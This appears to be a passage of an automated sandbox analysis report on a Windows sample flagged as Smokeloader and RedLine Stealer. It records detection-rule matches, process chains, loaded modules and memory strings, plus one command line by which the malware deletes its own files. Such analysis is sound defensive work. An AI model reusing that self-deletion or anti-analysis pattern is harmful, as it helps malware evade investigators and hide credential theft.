Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCD0570 9_2_6CCD0570
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC546D0 9_2_6CC546D0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC8E6E0 9_2_6CC8E6E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCCE6E0 9_2_6CCCE6E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC8C650 9_2_6CC8C650
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC5A7D0 9_2_6CC5A7D0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCB0700 9_2_6CCB0700
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC28090 9_2_6CC28090
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD0C0B0 9_2_6CD0C0B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC400B0 9_2_6CC400B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC7E070 9_2_6CC7E070
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCFC000 9_2_6CCFC000
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCF8010 9_2_6CCF8010
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC301E0 9_2_6CC301E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC98140 9_2_6CC98140
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD14130 9_2_6CD14130
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCA6130 9_2_6CCA6130
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CDB62C0 9_2_6CDB62C0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD022A0 9_2_6CD022A0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCFE2B0 9_2_6CCFE2B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCC8250 9_2_6CCC8250
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCB8260 9_2_6CCB8260
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCFA210 9_2_6CCFA210
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD08220 9_2_6CD08220
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC843E0 9_2_6CC843E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC623A0 9_2_6CC623A0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC8E3B0 9_2_6CC8E3B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC38340 9_2_6CC38340
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD72370 9_2_6CD72370
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC32370 9_2_6CC32370
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD4C360 9_2_6CD4C360
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCC6370 9_2_6CCC6370
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CCA2320 9_2_6CCA2320
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CD6DCD0 9_2_6CD6DCD0
Source: Joe Sandbox View Dropped File: C:\ProgramData\DGHIECGCBKFH\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\DGHIECGCBKFH\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: String function: 004087A0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: String function: 0040F5A0 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: String function: 0061F807 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: String function: 00618A07 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: String function: 6CDBD930 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: String function: 6CDB09D0 appears 229 times
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: String function: 6CC53620 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: String function: 6CDBDAE0 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: String function: 6CC59B10 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\A247.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6204 -s 1548
Source: 3.exe, 00000000.00000000.1980211482.0000000002C8C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesFilezera2 vs 3.exe
Source: 3.exe Binary or memory string: OriginalFilenamesFilezera2 vs 3.exe
Source: 3.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 8.2.5358.exe.4387719.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.5358.exe.2590000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.5358.exe.4387719.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.5358.exe.45b0000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.5358.exe.45b0000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.5358.exe.2590000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.2056416748.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2319506605.0000000002EAB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2319383367.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.2056350311.0000000002D4B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.2871870285.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/35@5/9
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC90300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 9_2_6CC90300
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D52619 CreateToolhelp32Snapshot,Module32First, 0_2_02D52619
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0042B20E CoCreateInstance, 5_2_0042B20E
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\rcjjrra Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6204
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A247.tmp Jump to behavior
Source: 3.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\5358.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.9.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.9.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.9.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.9.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.9.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.9.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.9.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: kat2225.tmp, kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.9.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: A247.exe, 00000005.00000003.2386153562.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2385765464.0000000002DD6000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2411021504.0000000002E52000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2860477821.000000000089E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2847534612.000000000087C000.00000004.00000020.00020000.00000000.sdmp, BKFBAK.9.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.9.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.9.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: 3.exe Virustotal: Detection: 47%
Source: unknown Process created: C:\Users\user\Desktop\3.exe "C:\Users\user\Desktop\3.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\rcjjrra C:\Users\user\AppData\Roaming\rcjjrra
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A247.exe C:\Users\user\AppData\Local\Temp\A247.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5358.exe C:\Users\user\AppData\Local\Temp\5358.exe
Source: C:\Users\user\AppData\Local\Temp\5358.exe Process created: C:\Users\user\AppData\Local\Temp\kat2225.tmp C:\Users\user\AppData\Local\Temp\kat2225.tmp
Source: C:\Users\user\AppData\Local\Temp\A247.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6204 -s 1548
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2225.tmp" & rd /s /q "C:\ProgramData\DGHIECGCBKFH" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A247.exe C:\Users\user\AppData\Local\Temp\A247.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5358.exe C:\Users\user\AppData\Local\Temp\5358.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Process created: C:\Users\user\AppData\Local\Temp\kat2225.tmp C:\Users\user\AppData\Local\Temp\kat2225.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2225.tmp" & rd /s /q "C:\ProgramData\DGHIECGCBKFH" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\3.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\3.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\3.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Section loaded: textshaping.dll Jump to behavior
